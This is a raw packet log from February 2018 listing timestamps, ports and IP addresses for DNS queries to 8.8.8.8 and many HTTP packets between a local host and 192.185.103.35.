Feb 3, 2018 21:33:19.252407074 CET	50993	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:33:20.213414907 CET	53	50993	8.8.8.8	192.168.1.72
Feb 3, 2018 21:33:22.028878927 CET	58503	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:33:23.030596018 CET	58503	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:33:23.613178968 CET	53	58503	8.8.8.8	192.168.1.72
Feb 3, 2018 21:33:23.621512890 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:23.621557951 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:23.622441053 CET	49752	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:23.622467041 CET	80	49752	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:23.622643948 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:23.622692108 CET	49752	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:23.623478889 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:23.623500109 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:24.137648106 CET	53	58503	8.8.8.8	192.168.1.72
Feb 3, 2018 21:33:26.117784023 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:26.117819071 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:26.117831945 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:26.117860079 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:26.117969990 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:26.117988110 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:26.118311882 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:26.182646990 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:26.182672977 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:26.182681084 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:26.182811022 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:26.182827950 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:26.183248043 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:26.183286905 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:26.183769941 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:26.457500935 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:26.457812071 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:26.784889936 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:26.785079002 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:26.849021912 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:26.849045992 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:26.849055052 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:26.849175930 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:26.912682056 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:26.912714958 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:26.912727118 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:26.912878036 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:26.981244087 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:26.981267929 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:26.981278896 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:26.981780052 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:27.051090956 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.051116943 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.051198959 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:27.051315069 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.051332951 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.051342964 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.051698923 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:27.127115965 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.127300024 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.127346992 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:27.127362967 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.127684116 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:27.307444096 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.307477951 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.307487011 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.307573080 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:27.307636976 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.307658911 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.309976101 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:27.310005903 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.311551094 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:27.392566919 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.392591000 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.392713070 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:27.394229889 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.394346952 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:27.499435902 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.499461889 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.499469995 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.499793053 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:27.890499115 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.890523911 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.890532017 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.890542030 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.890569925 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.891769886 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:27.891788006 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:27.892229080 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:28.916445017 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:28.916469097 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:28.916481018 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:28.916717052 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:28.916760921 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:29.099240065 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.099263906 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.099414110 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:29.099428892 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.099757910 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:29.104579926 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.104603052 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.104715109 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:29.183496952 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.183522940 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.183532000 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.183742046 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:29.183757067 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.184125900 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:29.185796022 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.185936928 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:29.271013975 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.271194935 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:29.272476912 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.272500992 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.272509098 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.272660017 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:29.369254112 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.369290113 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.369301081 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.369755983 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:29.446892023 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.446916103 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.447087049 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:29.503572941 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.503627062 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.503648043 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.503758907 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:29.800438881 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.800471067 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.800487995 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.800498009 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.800519943 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.800605059 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.800647974 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:29.800692081 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.803683043 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:29.869735956 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.869771004 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.869785070 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.869888067 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:29.870417118 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:29.940359116 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.940376997 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.940517902 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:29.940579891 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.940602064 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.940613985 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:29.940886974 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:30.011462927 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.011485100 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.011631966 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:30.012449026 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.012471914 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.012480021 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.012566090 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:30.075263977 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.075288057 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.075295925 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.075714111 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:30.137453079 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.137476921 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.137485027 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.137599945 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:30.196033001 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.196057081 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.196074963 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.196461916 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:30.196480036 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.196877956 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:30.196923971 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.196943045 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.196957111 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.197273016 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:30.259584904 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.259629011 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.259658098 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.259819984 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:30.259835005 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.260201931 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:30.324033022 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.324058056 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.324065924 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.324208021 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:30.324244976 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.324254990 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.324284077 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.324704885 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:30.373692989 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.373718023 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.373727083 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.375403881 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:30.408520937 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.408545971 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.408555031 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.408751965 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:30.470942020 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.470968008 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.470977068 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.471128941 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:30.471154928 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.471539021 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:30.471930981 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.471957922 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.471966028 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.472076893 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:30.533495903 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.533524036 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.533533096 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.533660889 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:30.598351002 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.598376989 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.598381996 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.598460913 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.598475933 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.598520994 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:30.598560095 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.598891973 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:30.668131113 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.668157101 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.668164968 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.668277025 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:30.668420076 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.668437958 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.668448925 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:30.668975115 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:31.719016075 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:31.719039917 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:31.719048977 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:31.719196081 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:31.866384983 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:31.866410017 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:31.866416931 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:31.866554976 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:31.866573095 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:31.866950989 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:31.949934959 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:31.949959040 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:31.949968100 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:31.951682091 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:32.039995909 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.040025949 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.040045023 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.040313959 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:32.139920950 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.139946938 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.139955997 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.140350103 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:32.377634048 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.377656937 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.377665043 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.379703045 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:32.379724026 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.380054951 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:32.499028921 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.499052048 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.499059916 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.499257088 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:32.596803904 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.596828938 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.596843958 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.596853971 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.596863031 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.596995115 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:32.597018003 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.597413063 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:32.697673082 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.697696924 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.697705030 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.697827101 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:32.798362017 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.798919916 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:32.829250097 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.829297066 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.829307079 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.829538107 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:32.905364037 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.905390024 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.905399084 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:32.905524969 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.009262085 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.009289980 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.009299040 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.009438038 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.088238001 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.088268995 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.088284969 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.088419914 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.088438034 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.089054108 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.164328098 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.164357901 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.164366961 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.164463997 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.165303946 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.165333033 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.165347099 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.165467024 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.248825073 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.248856068 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.248871088 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.249016047 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.256999969 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.257028103 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.257035971 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.257170916 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.335994005 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.336535931 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.336564064 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.336580038 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.336608887 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.337121964 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.419867039 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.419883013 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.419892073 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.420058012 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.468960047 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.468974113 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.468988895 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.469229937 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.550832033 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.550852060 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.550865889 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.550946951 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.550967932 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.555680990 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.564905882 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.564917088 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.564927101 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.565011024 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.638109922 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.638120890 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.638125896 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.638195992 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.644546032 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.644556046 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.644567013 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.644661903 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.711875916 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.711891890 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.711903095 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.712023973 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.712044954 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.715416908 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.715428114 CET	80	49751	192.185.103.35	192.168.1.72
Feb 3, 2018 21:33:33.715517044 CET	49751	80	192.168.1.72	192.185.103.35
Feb 3, 2018 21:33:33.715533972 CET	80	49751	192.185.103.35	192.168.1.72
